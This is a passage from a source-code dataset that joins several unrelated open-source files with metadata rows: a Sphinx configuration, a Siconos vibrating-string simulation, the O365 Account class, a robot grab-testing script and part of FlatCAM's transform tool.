# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'highlightjsdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'highlightjs.tex', u'highlight.js Documentation',
u'Ivan Sagalaev', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'highlightjs', u'highlight.js Documentation',
[u'Ivan Sagalaev'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'highlightjs', u'highlight.js Documentation',
u'Ivan Sagalaev', 'highlightjs', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| 32.00823 | 80 | 0.714965 |
4e2f593adcc98c2355d46b879b5dfc2f15ae328d | 4,740 | py | Python | examples/Mechanics/Music/run.py | bremond/siconos | 8deea56ff6779379f4f69e0376d24a81562a42d4 | [
"Apache-2.0"
] | null | null | null | examples/Mechanics/Music/run.py | bremond/siconos | 8deea56ff6779379f4f69e0376d24a81562a42d4 | [
"Apache-2.0"
] | null | null | null | examples/Mechanics/Music/run.py | bremond/siconos | 8deea56ff6779379f4f69e0376d24a81562a42d4 | [
"Apache-2.0"
] | null | null | null | """Implementation of vibrating string model, described
in JSV paper (Issanchou 2017) and using Siconos for contact
simulation.
"""
from guitar import StringDS, Fret, Guitar
#import siconos.kernel as sk
import time
import numpy as np
import scipy.io
import sys,os
visu=False
if visu:
import matplotlib.pyplot as plt
# ======== Description of the string(s) ==========
# -- Geometry and material --
G_string = {
'length': 0.863,
'diameter': 0.43e-3,
'density': 6.69e-3,
'B': 3.5e-5,
'tension': 191.6,
}
# A dictionnary with parameters required to compute quality factor
damping_parameters = {
'nu_air': 1.8e-5,
'rho_air': 1.2,
'delta_ve': 0.01,
'1/qte': 6e-6}
# -- Spatial discretisation (modal proj) and initial conditions --
number_of_modes = 864
# position (index) of the max value of initial state
# --> middle of the string
#imiddle = int((number_of_modes + 2) / 2)
# -- The dynamical system(s) --
# Warning: 'real dofs' numbers start from 0 to number_of_modes + 1
# but DS size is number_of_modes, boundary points are ignored.
guitar_string = StringDS(number_of_modes, geometry_and_material=G_string,
damping_parameters=damping_parameters,
max_coords=(7.8e-3, .64))
# -- The interaction(s) between strings and frets --
# One Interaction is needed for each contact point.
frets_file = './donnees_siconos/pb2_h.mat'
frets_positions = scipy.io.loadmat(frets_file)['h'][:600, 0]
nb_frets = frets_positions.size
dx = guitar_string.space_step
frets_indices = np.arange(1, nb_frets + 1)
#array(np.round(frets_positions / dx), np.int32)
#frets_y = np.linspace(-0.5e-4, -1e-4, 20)
frets = []
interactions = {}
for i in range(nb_frets):
frets.append(Fret(guitar_string,
contact_positions=(frets_indices[i],
frets_positions[i]),
restitution_coeff=0.))
interactions[frets[-1]] = guitar_string
# contact at a point close to left boundary.
# guitar_fret_left = Fret(guitar_string, contact_positions=(3, -1.e-4),
# restitution_coeff=0.9)
# -- Model and simulaton --
# sample freq and time-discretisation
# if freq is set as input arg ...
if len(sys.argv) > 1:
fe = float(sys.argv[1])
else:
fe = 1960
initial_time = 0.
final_time = 0.3
final_time = 3.00
guitar_model = Guitar(interactions,
#{guitar_fret_middle: guitar_string,
# guitar_fret_left: guitar_string
# },
[initial_time, final_time],
fe)
simu = guitar_model.simu
# sk.TimeStepping(time_discr, osi, osnspb)
# # -- Model setup with dynamics, interaction and simulation --
# -- Save inital state --
# Note about savings:
# For each iteration k, we need :
# - the current time value, saved in guitar_model.time[k]
# - data for ds (positions, velocities ...):
# use save_ds_state(k, ds) for each required ds
# - data for interactions (impulsion at impact, distance ...)
# use save_interaction_state(k, interaction)
guitar_model.time[0] = initial_time
guitar_model.save_ds_state(0, guitar_string)
for i in range(len(frets)):
guitar_model.save_interaction_state(0, frets[i])
k = 1
print("Start simulation ...")
start_time = time.clock()
while simu.hasNextEvent():
if k % 100 == 0:
print('step = ', k, '---- time = ',
simu.nextTime(),
'------------------------')
simu.computeOneStep()
guitar_model.time[k] = simu.nextTime()
guitar_model.save_ds_state(k, guitar_string)
for i in range(len(frets)):
guitar_model.save_interaction_state(k, frets[i])
k += 1
simu.nextStep()
print('End of simulation process. Duration: ', time.clock() - start_time)
# -- Save results for ds in numpy file +--
result_dir = 'results'
if not os.path.exists(result_dir):
os.mkdir(result_dir)
output = guitar_model.data_ds[guitar_string]
filename = os.path.join(result_dir,'data_ds_'+str(number_of_modes)+'_'+str(fe))
np.save(filename, output)
# -- Save results for interaction in numpy file --
for i in range(len(frets)):
output = guitar_model.data_interactions[frets[i]]
filename = os.path.join(result_dir,'data_interactions_'+str(i)+'_'+str(number_of_modes)+'_'+str(fe))
np.save(filename, output)
# to plot results, call:
#guitar_model.plot_ds_state(some_ds, indices, fig_number)
# --> plot some_ds attributes (position/time ...)
#guitar_model.plot_interaction(some_interaction, fig_number)
# --> plot data relative to some_interaction
# guitar_model.plot_mode(some_ds, filename)
# --> create animation for some_ds mode
#guitar_model.plot_ds_state(guitar_string)
| 30.980392 | 104 | 0.662869 |
194f7921374d383bb2e10c07822f7a203dcc1f2c | 7,060 | py | Python | O365/account.py | llange/python-o365 | 11c7e81c27c082a1169cce21ea7d3f45e4a5d47b | [
"Apache-2.0"
] | null | null | null | O365/account.py | llange/python-o365 | 11c7e81c27c082a1169cce21ea7d3f45e4a5d47b | [
"Apache-2.0"
] | null | null | null | O365/account.py | llange/python-o365 | 11c7e81c27c082a1169cce21ea7d3f45e4a5d47b | [
"Apache-2.0"
] | null | null | null | from .address_book import AddressBook, GlobalAddressList
from .calendar import Schedule
from .connection import Connection, Protocol, MSGraphProtocol
from .connection import oauth_authentication_flow
from .drive import Storage
from .mailbox import MailBox
from .message import Message
from .sharepoint import Sharepoint
from .planner import Planner
from .utils import ME_RESOURCE
class Account(object):
def __init__(self, credentials, *, protocol=None, main_resource=ME_RESOURCE,
**kwargs):
""" Creates an object which is used to access resources related to the
specified credentials
:param tuple credentials: a tuple containing the client_id
and client_secret
:param Protocol protocol: the protocol to be used in this account
:param str main_resource: the resource to be used by this account
('me' or 'users')
:param kwargs: any extra args to be passed to the Connection instance
:raises ValueError: if an invalid protocol is passed
"""
protocol = protocol or MSGraphProtocol # Defaults to Graph protocol
self.protocol = protocol(default_resource=main_resource,
**kwargs) if isinstance(protocol,
type) else protocol
if not isinstance(self.protocol, Protocol):
raise ValueError("'protocol' must be a subclass of Protocol")
self.con = Connection(credentials, **kwargs)
self.main_resource = main_resource
def __repr__(self):
if self.con.auth:
return 'Account Client Id: {}'.format(self.con.auth[0])
else:
return 'Unidentified Account'
@property
def is_authenticated(self):
"""
Checks whether the library has the authentication and that is not expired
:return: True if authenticated, False otherwise
"""
token = self.con.token_backend.token
if not token:
token = self.con.token_backend.get_token()
return token is not None and not token.is_expired
def authenticate(self, *, scopes, **kwargs):
""" Performs the oauth authentication flow resulting in a stored token
It uses the credentials passed on instantiation
:param list[str] scopes: list of protocol user scopes to be converted
by the protocol or scope helpers
:param kwargs: other configurations to be passed to the
Connection instance
:return: Success / Failure
:rtype: bool
"""
kwargs.setdefault('token_backend', self.con.token_backend)
return oauth_authentication_flow(*self.con.auth, scopes=scopes,
protocol=self.protocol, **kwargs)
@property
def connection(self):
""" Alias for self.con
:rtype: Connection
"""
return self.con
def new_message(self, resource=None):
""" Creates a new message to be sent or stored
:param str resource: Custom resource to be used in this message
(Defaults to parent main_resource)
:return: New empty message
:rtype: Message
"""
return Message(parent=self, main_resource=resource, is_draft=True)
def mailbox(self, resource=None):
""" Get an instance to the mailbox for the specified account resource
:param str resource: Custom resource to be used in this mailbox
(Defaults to parent main_resource)
:return: a representation of account mailbox
:rtype: MailBox
"""
return MailBox(parent=self, main_resource=resource, name='MailBox')
def address_book(self, *, resource=None, address_book='personal'):
""" Get an instance to the specified address book for the
specified account resource
:param str resource: Custom resource to be used in this address book
(Defaults to parent main_resource)
:param str address_book: Choose from 'Personal' or
'GAL' (Global Address List)
:return: a representation of the specified address book
:rtype: AddressBook or GlobalAddressList
:raises RuntimeError: if invalid address_book is specified
"""
if address_book.lower() == 'personal':
return AddressBook(parent=self, main_resource=resource,
name='Personal Address Book')
elif address_book.lower() == 'gal':
return GlobalAddressList(parent=self)
else:
raise RuntimeError(
'address_book must be either "personal" '
'(resource address book) or "gal" (Global Address List)')
def schedule(self, *, resource=None):
""" Get an instance to work with calendar events for the
specified account resource
:param str resource: Custom resource to be used in this schedule object
(Defaults to parent main_resource)
:return: a representation of calendar events
:rtype: Schedule
"""
return Schedule(parent=self, main_resource=resource)
def storage(self, *, resource=None):
""" Get an instance to handle file storage (OneDrive / Sharepoint)
for the specified account resource
:param str resource: Custom resource to be used in this drive object
(Defaults to parent main_resource)
:return: a representation of OneDrive File Storage
:rtype: Storage
:raises RuntimeError: if protocol doesn't support the feature
"""
if not isinstance(self.protocol, MSGraphProtocol):
# TODO: Custom protocol accessing OneDrive/Sharepoint Api fails here
raise RuntimeError(
'Drive options only works on Microsoft Graph API')
return Storage(parent=self, main_resource=resource)
def sharepoint(self, *, resource=''):
""" Get an instance to read information from Sharepoint sites for the
specified account resource
:param str resource: Custom resource to be used in this sharepoint
object (Defaults to parent main_resource)
:return: a representation of Sharepoint Sites
:rtype: Sharepoint
:raises RuntimeError: if protocol doesn't support the feature
"""
if not isinstance(self.protocol, MSGraphProtocol):
# TODO: Custom protocol accessing OneDrive/Sharepoint Api fails here
raise RuntimeError(
'Sharepoint api only works on Microsoft Graph API')
return Sharepoint(parent=self, main_resource=resource)
def planner(self, *, resource=''):
""" Get an instance to read information from Microsoft planner """
if not isinstance(self.protocol, MSGraphProtocol):
# TODO: Custom protocol accessing OneDrive/Sharepoint Api fails here
raise RuntimeError(
'planner api only works on Microsoft Graph API')
return Planner(parent=self, main_resource=resource)
| 39.662921 | 81 | 0.649292 |
1bcfb1be64aefa847642b99db29a5ff5cfbc73b9 | 292 | py | Python | client_code/routing/__init__.py | juanpaul101/anvil-extras | 580bed42128653394494ed0f210a7a918278be30 | [
"MIT"
] | null | null | null | client_code/routing/__init__.py | juanpaul101/anvil-extras | 580bed42128653394494ed0f210a7a918278be30 | [
"MIT"
] | null | null | null | client_code/routing/__init__.py | juanpaul101/anvil-extras | 580bed42128653394494ed0f210a7a918278be30 | [
"MIT"
] | null | null | null | # SPDX-License-Identifier: MIT
#
# Copyright (c) 2021 The Anvil Extras project team members listed at
# https://github.com/anvilistas/anvil-extras/graphs/contributors
#
# This software is published at https://github.com/anvilistas/anvil-extras
__version__ = "1.5.1"
from ._routing import *
| 26.545455 | 74 | 0.763699 |
92ddb519b2f65c6f546e2bfbbe9999c6a45a9e5f | 3,603 | py | Python | scripts/testAllGrabs.py | Falcons-Robocup/code | 2281a8569e7f11cbd3238b7cc7341c09e2e16249 | [
"Apache-2.0"
] | 2 | 2021-01-15T13:27:19.000Z | 2021-08-04T08:40:52.000Z | scripts/testAllGrabs.py | Falcons-Robocup/code | 2281a8569e7f11cbd3238b7cc7341c09e2e16249 | [
"Apache-2.0"
] | null | null | null | scripts/testAllGrabs.py | Falcons-Robocup/code | 2281a8569e7f11cbd3238b7cc7341c09e2e16249 | [
"Apache-2.0"
] | 5 | 2018-05-01T10:39:31.000Z | 2022-03-25T03:02:35.000Z | #!/usr/bin/env python3
#
# Jan Feitsma, december 2019
import sys, time
import argparse
from testGrabs import TestGrabs, report
if __name__ == '__main__':
# Argument parsing.
descriptionTxt = """Regression-test the multiCam software on ALL available grabs. Write a small report. Example partial output:
test 1/54: r1 20181030_212155 ... robotpos=n/a ball=n/a #obst=0 bposs=False
test 2/54: r1 20190223_135008 ... robotpos=(-0.00,-0.00, 0.807) ball=(-0.27,-0.74, 0.00) #obst=0 bposs=False
test 3/54: r1 20190427_160053 ... robotpos=n/a ball=n/a #obst=0 bposs=False
test 4/54: r2 20180619_214554 ... robotpos=n/a ball=n/a #obst=0 bposs=False
test 5/54: r2 20180809_223758 ... robotpos=(-4.49,-7.50, 6.165) ball=(-3.26,-7.84, 0.00) #obst=1 bposs=False
test 6/54: r2 20180809_223759 ... robotpos=n/a ball=n/a #obst=0 bposs=False
test 7/54: r2 20180809_223800 ... robotpos=(-4.48,-7.52, 6.166) ball=(-3.26,-8.91, 0.00) #obst=1 bposs=False
...
Note: this test uses worldModel for the final (time-averaged) interpretation, since it is too tricky to reliably interpret the RTDB vision output buffers. Perhaps it would be worthwile to address this issue towards creating a vision-only option?
See also: testGrabs.py (to run a single set of grabs)."""
parser = argparse.ArgumentParser(description=descriptionTxt, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-v', '--verbose', help='print each command/action', action='store_true')
parser.add_argument('-m', '--make', help='first make the tools', action='store_true')
parser.add_argument('-M', '--cleanmake', help='first clean make the tools', action='store_true')
parser.add_argument('-t', '--timeout', help='timeout before a test iteration is ended', type=float, default=15.0)
parser.add_argument('-b', '--block', help='instead of using timeout, block each iteration until multiCam GUI is shut down by user', action='store_true')
parser.add_argument('-s', '--start', help='start at given grab index', type=int, default=1)
# TODO: speedup getting a lock etc. such that iteration timeout can be reduced? 10 seconds is apparently not enough
args = parser.parse_args()
# setup TestGrabs object, suppress output
tester = TestGrabs(args.verbose, True)
# build?
if args.make or args.cleanmake:
tester.make(args.cleanmake)
# create the queue of grabs to be tested
testqueue = []
for robot in range(1, 20):
timestamps = tester.findGrabTimestamps(robot)
for timestamp in timestamps:
testqueue.append((robot, timestamp))
# run the queue
print("")
count = args.start - 1
for (robot, timestamp) in testqueue[(args.start-1):]:
count += 1
grabs = tester.getGrabs(robot, timestamp)
print("{n}test {:2d}/{:2d}: r{} {} ... {n}".format(count, len(testqueue), robot, timestamp, n=["","\n"][args.verbose]), end="", flush=True)
tester.run(robot, grabs, block=args.block)
if not args.block:
# wait a few seconds before shutting down
time.sleep(args.timeout)
tester.shutdown(exit=False)
# inspect RTDB contents
if args.verbose:
print("{n}test {:2d}/{:2d}: r{} {} result: ".format(count, len(testqueue), robot, timestamp, n=["","\n"][args.verbose]), end="")
print(report(robot))
# cleanup
tester.shutdown(exit=True)
| 50.041667 | 245 | 0.640577 |
b9deb4c16e0db60a9fb616d86411e9b44e1032c9 | 41,449 | py | Python | appTools/ToolTransform.py | DannyPol/flatcam | 25a8634d0658e98b7fae31a095f8bef40c1b3067 | [
"MIT"
] | 1 | 2022-02-11T06:19:34.000Z | 2022-02-11T06:19:34.000Z | appTools/ToolTransform.py | MRemy2/FlatCam | d4f941335ca8a8d5351aab23b396f99da06a9029 | [
"MIT"
] | null | null | null | appTools/ToolTransform.py | MRemy2/FlatCam | d4f941335ca8a8d5351aab23b396f99da06a9029 | [
"MIT"
] | null | null | null | # ##########################################################
# FlatCAM: 2D Post-processing for Manufacturing #
# File Author: Marius Adrian Stanciu (c) #
# Date: 3/10/2019 #
# MIT Licence #
# ##########################################################
from PyQt5 import QtWidgets, QtGui, QtCore
from appTool import AppTool
from appGUI.GUIElements import FCDoubleSpinner, FCCheckBox, FCButton, OptionalInputSection, FCComboBox, \
NumericalEvalTupleEntry, FCLabel
import numpy as np
import gettext
import appTranslation as fcTranslate
import builtins
fcTranslate.apply_language('strings')
if '_' not in builtins.__dict__:
_ = gettext.gettext
class ToolTransform(AppTool):
def __init__(self, app):
AppTool.__init__(self, app)
self.decimals = self.app.decimals
# #############################################################################
# ######################### Tool GUI ##########################################
# #############################################################################
self.ui = TransformUI(layout=self.layout, app=self.app)
self.toolName = self.ui.toolName
# ## Signals
self.ui.ref_combo.currentIndexChanged.connect(self.ui.on_reference_changed)
self.ui.type_obj_combo.currentIndexChanged.connect(self.on_type_obj_index_changed)
self.ui.point_button.clicked.connect(self.on_add_coords)
self.ui.rotate_button.clicked.connect(self.on_rotate)
self.ui.skewx_button.clicked.connect(self.on_skewx)
self.ui.skewy_button.clicked.connect(self.on_skewy)
self.ui.scalex_button.clicked.connect(self.on_scalex)
self.ui.scaley_button.clicked.connect(self.on_scaley)
self.ui.offx_button.clicked.connect(self.on_offx)
self.ui.offy_button.clicked.connect(self.on_offy)
self.ui.flipx_button.clicked.connect(self.on_flipx)
self.ui.flipy_button.clicked.connect(self.on_flipy)
self.ui.buffer_button.clicked.connect(self.on_buffer_by_distance)
self.ui.buffer_factor_button.clicked.connect(self.on_buffer_by_factor)
self.ui.reset_button.clicked.connect(self.set_tool_ui)
def run(self, toggle=True):
self.app.defaults.report_usage("ToolTransform()")
if toggle:
# if the splitter is hidden, display it, else hide it but only if the current widget is the same
if self.app.ui.splitter.sizes()[0] == 0:
self.app.ui.splitter.setSizes([1, 1])
else:
try:
if self.app.ui.tool_scroll_area.widget().objectName() == self.toolName:
# if tab is populated with the tool but it does not have the focus, focus on it
if not self.app.ui.notebook.currentWidget() is self.app.ui.tool_tab:
# focus on Tool Tab
self.app.ui.notebook.setCurrentWidget(self.app.ui.tool_tab)
else:
self.app.ui.splitter.setSizes([0, 1])
except AttributeError:
pass
else:
if self.app.ui.splitter.sizes()[0] == 0:
self.app.ui.splitter.setSizes([1, 1])
AppTool.run(self)
self.set_tool_ui()
self.app.ui.notebook.setTabText(2, _("Transform Tool"))
def install(self, icon=None, separator=None, **kwargs):
AppTool.install(self, icon, separator, shortcut='Alt+T', **kwargs)
def set_tool_ui(self):
# ## Initialize form
self.ui.ref_combo.set_value(self.app.defaults["tools_transform_reference"])
self.ui.type_obj_combo.set_value(self.app.defaults["tools_transform_ref_object"])
self.ui.point_entry.set_value(self.app.defaults["tools_transform_ref_point"])
self.ui.rotate_entry.set_value(self.app.defaults["tools_transform_rotate"])
self.ui.skewx_entry.set_value(self.app.defaults["tools_transform_skew_x"])
self.ui.skewy_entry.set_value(self.app.defaults["tools_transform_skew_y"])
self.ui.skew_link_cb.set_value(self.app.defaults["tools_transform_skew_link"])
self.ui.scalex_entry.set_value(self.app.defaults["tools_transform_scale_x"])
self.ui.scaley_entry.set_value(self.app.defaults["tools_transform_scale_y"])
self.ui.scale_link_cb.set_value(self.app.defaults["tools_transform_scale_link"])
self.ui.offx_entry.set_value(self.app.defaults["tools_transform_offset_x"])
self.ui.offy_entry.set_value(self.app.defaults["tools_transform_offset_y"])
self.ui.buffer_entry.set_value(self.app.defaults["tools_transform_buffer_dis"])
self.ui.buffer_factor_entry.set_value(self.app.defaults["tools_transform_buffer_factor"])
self.ui.buffer_rounded_cb.set_value(self.app.defaults["tools_transform_buffer_corner"])
# initial state is hidden
self.ui.point_label.hide()
self.ui.point_entry.hide()
self.ui.point_button.hide()
self.ui.type_object_label.hide()
self.ui.type_obj_combo.hide()
self.ui.object_combo.hide()
def on_type_obj_index_changed(self, index):
self.ui.object_combo.setRootModelIndex(self.app.collection.index(index, 0, QtCore.QModelIndex()))
self.ui.object_combo.setCurrentIndex(0)
self.ui.object_combo.obj_type = {
_("Gerber"): "Gerber", _("Excellon"): "Excellon", _("Geometry"): "Geometry"
}[self.ui.type_obj_combo.get_value()]
def on_calculate_reference(self):
ref_val = self.ui.ref_combo.currentIndex()
if ref_val == 0: # "Origin" reference
return 0, 0
elif ref_val == 1: # "Selection" reference
sel_list = self.app.collection.get_selected()
if sel_list:
xmin, ymin, xmax, ymax = self.alt_bounds(obj_list=sel_list)
px = (xmax + xmin) * 0.5
py = (ymax + ymin) * 0.5
return px, py
else:
self.app.inform.emit('[ERROR_NOTCL] %s' % _("No object is selected."))
return "fail"
elif ref_val == 2: # "Point" reference
point_val = self.uipoint_entry.get_value()
try:
px, py = eval('{}'.format(point_val))
return px, py
except Exception:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("Incorrect format for Point value. Needs format X,Y"))
return "fail"
else: # "Object" reference
obj_name = self.ui.object_combo.get_value()
ref_obj = self.app.collection.get_by_name(obj_name)
xmin, ymin, xmax, ymax = ref_obj.bounds()
px = (xmax + xmin) * 0.5
py = (ymax + ymin) * 0.5
return px, py
def on_add_coords(self):
val = self.app.clipboard.text()
self.ui.point_entry.set_value(val)
def on_rotate(self):
value = float(self.ui.rotate_entry.get_value())
if value == 0:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("Rotate transformation can not be done for a value of 0."))
return
point = self.on_calculate_reference()
if point == 'fail':
return
self.app.worker_task.emit({'fcn': self.on_rotate_action, 'params': [value, point]})
def on_flipx(self):
axis = 'Y'
point = self.on_calculate_reference()
if point == 'fail':
return
self.app.worker_task.emit({'fcn': self.on_flip, 'params': [axis, point]})
def on_flipy(self):
axis = 'X'
point = self.on_calculate_reference()
if point == 'fail':
return
self.app.worker_task.emit({'fcn': self.on_flip, 'params': [axis, point]})
def on_skewx(self):
xvalue = float(self.ui.skewx_entry.get_value())
if xvalue == 0:
return
if self.ui.skew_link_cb.get_value():
yvalue = xvalue
else:
yvalue = 0
axis = 'X'
point = self.on_calculate_reference()
if point == 'fail':
return
self.app.worker_task.emit({'fcn': self.on_skew, 'params': [axis, xvalue, yvalue, point]})
def on_skewy(self):
xvalue = 0
yvalue = float(self.ui.skewy_entry.get_value())
if yvalue == 0:
return
axis = 'Y'
point = self.on_calculate_reference()
if point == 'fail':
return
self.app.worker_task.emit({'fcn': self.on_skew, 'params': [axis, xvalue, yvalue, point]})
def on_scalex(self):
xvalue = float(self.ui.scalex_entry.get_value())
if xvalue == 0 or xvalue == 1:
self.app.inform.emit('[WARNING_NOTCL] %s' %
_("Scale transformation can not be done for a factor of 0 or 1."))
return
if self.ui.scale_link_cb.get_value():
yvalue = xvalue
else:
yvalue = 1
axis = 'X'
point = self.on_calculate_reference()
if point == 'fail':
return
self.app.worker_task.emit({'fcn': self.on_scale, 'params': [axis, xvalue, yvalue, point]})
def on_scaley(self):
xvalue = 1
yvalue = float(self.ui.scaley_entry.get_value())
if yvalue == 0 or yvalue == 1:
self.app.inform.emit('[WARNING_NOTCL] %s' %
_("Scale transformation can not be done for a factor of 0 or 1."))
return
axis = 'Y'
point = self.on_calculate_reference()
if point == 'fail':
return
self.app.worker_task.emit({'fcn': self.on_scale, 'params': [axis, xvalue, yvalue, point]})
def on_offx(self):
value = float(self.ui.offx_entry.get_value())
if value == 0:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("Offset transformation can not be done for a value of 0."))
return
axis = 'X'
self.app.worker_task.emit({'fcn': self.on_offset, 'params': [axis, value]})
def on_offy(self):
value = float(self.ui.offy_entry.get_value())
if value == 0:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("Offset transformation can not be done for a value of 0."))
return
axis = 'Y'
self.app.worker_task.emit({'fcn': self.on_offset, 'params': [axis, value]})
def on_buffer_by_distance(self):
value = self.ui.buffer_entry.get_value()
join = 1 if self.ui.buffer_rounded_cb.get_value() else 2
self.app.worker_task.emit({'fcn': self.on_buffer_action, 'params': [value, join]})
def on_buffer_by_factor(self):
value = 1 + self.ui.buffer_factor_entry.get_value() / 100.0
join = 1 if self.ui.buffer_rounded_cb.get_value() else 2
# tell the buffer method to use the factor
factor = True
self.app.worker_task.emit({'fcn': self.on_buffer_action, 'params': [value, join, factor]})
def on_rotate_action(self, num, point):
obj_list = self.app.collection.get_selected()
if not obj_list:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("No object is selected."))
return
else:
with self.app.proc_container.new(_("Appying Rotate")):
try:
px, py = point
for sel_obj in obj_list:
if sel_obj.kind == 'cncjob':
self.app.inform.emit(_("CNCJob objects can't be rotated."))
else:
sel_obj.rotate(-num, point=(px, py))
self.app.app_obj.object_changed.emit(sel_obj)
# add information to the object that it was changed and how much
sel_obj.options['rotate'] = num
sel_obj.plot()
self.app.inform.emit('[success] %s...' % _('Rotate done'))
except Exception as e:
self.app.inform.emit('[ERROR_NOTCL] %s: %s.' % (_("Action was not executed"), str(e)))
return
def on_flip(self, axis, point):
obj_list = self.app.collection.get_selected()
if not obj_list:
self.app.inform.emit('[WARNING_NOTCL] %s!' % _("No object is selected."))
return
else:
with self.app.proc_container.new(_("Applying Flip")):
try:
px, py = point
# execute mirroring
for sel_obj in obj_list:
if sel_obj.kind == 'cncjob':
self.app.inform.emit(_("CNCJob objects can't be mirrored/flipped."))
else:
if axis == 'X':
sel_obj.mirror('X', (px, py))
# add information to the object that it was changed and how much
# the axis is reversed because of the reference
if 'mirror_y' in sel_obj.options:
sel_obj.options['mirror_y'] = not sel_obj.options['mirror_y']
else:
sel_obj.options['mirror_y'] = True
self.app.inform.emit('[success] %s...' % _('Flip on Y axis done'))
elif axis == 'Y':
sel_obj.mirror('Y', (px, py))
# add information to the object that it was changed and how much
# the axis is reversed because of the reference
if 'mirror_x' in sel_obj.options:
sel_obj.options['mirror_x'] = not sel_obj.options['mirror_x']
else:
sel_obj.options['mirror_x'] = True
self.app.inform.emit('[success] %s...' % _('Flip on X axis done'))
self.app.app_obj.object_changed.emit(sel_obj)
sel_obj.plot()
except Exception as e:
self.app.inform.emit('[ERROR_NOTCL] %s: %s.' % (_("Action was not executed"), str(e)))
return
def on_skew(self, axis, xvalue, yvalue, point):
obj_list = self.app.collection.get_selected()
if xvalue in [90, 180] or yvalue in [90, 180] or xvalue == yvalue == 0:
self.app.inform.emit('[WARNING_NOTCL] %s' %
_("Skew transformation can not be done for 0, 90 and 180 degrees."))
return
if not obj_list:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("No object is selected."))
return
else:
with self.app.proc_container.new(_("Applying Skew")):
try:
px, py = point
for sel_obj in obj_list:
if sel_obj.kind == 'cncjob':
self.app.inform.emit(_("CNCJob objects can't be skewed."))
else:
sel_obj.skew(xvalue, yvalue, point=(px, py))
# add information to the object that it was changed and how much
sel_obj.options['skew_x'] = xvalue
sel_obj.options['skew_y'] = yvalue
self.app.app_obj.object_changed.emit(sel_obj)
sel_obj.plot()
self.app.inform.emit('[success] %s %s %s...' % (_('Skew on the'), str(axis), _("axis done")))
except Exception as e:
self.app.inform.emit('[ERROR_NOTCL] %s: %s.' % (_("Action was not executed"), str(e)))
return
def on_scale(self, axis, xfactor, yfactor, point=None):
obj_list = self.app.collection.get_selected()
if not obj_list:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("No object is selected."))
return
else:
with self.app.proc_container.new(_("Applying Scale")):
try:
px, py = point
for sel_obj in obj_list:
if sel_obj.kind == 'cncjob':
self.app.inform.emit(_("CNCJob objects can't be scaled."))
else:
sel_obj.scale(xfactor, yfactor, point=(px, py))
# add information to the object that it was changed and how much
sel_obj.options['scale_x'] = xfactor
sel_obj.options['scale_y'] = yfactor
self.app.app_obj.object_changed.emit(sel_obj)
sel_obj.plot()
self.app.inform.emit('[success] %s %s %s...' % (_('Scale on the'), str(axis), _('axis done')))
except Exception as e:
self.app.inform.emit('[ERROR_NOTCL] %s: %s.' % (_("Action was not executed"), str(e)))
return
def on_offset(self, axis, num):
obj_list = self.app.collection.get_selected()
if not obj_list:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("No object is selected."))
return
else:
with self.app.proc_container.new(_("Applying Offset")):
try:
for sel_obj in obj_list:
if sel_obj.kind == 'cncjob':
self.app.inform.emit(_("CNCJob objects can't be offset."))
else:
if axis == 'X':
sel_obj.offset((num, 0))
# add information to the object that it was changed and how much
sel_obj.options['offset_x'] = num
elif axis == 'Y':
sel_obj.offset((0, num))
# add information to the object that it was changed and how much
sel_obj.options['offset_y'] = num
self.app.app_obj.object_changed.emit(sel_obj)
sel_obj.plot()
self.app.inform.emit('[success] %s %s %s...' % (_('Offset on the'), str(axis), _('axis done')))
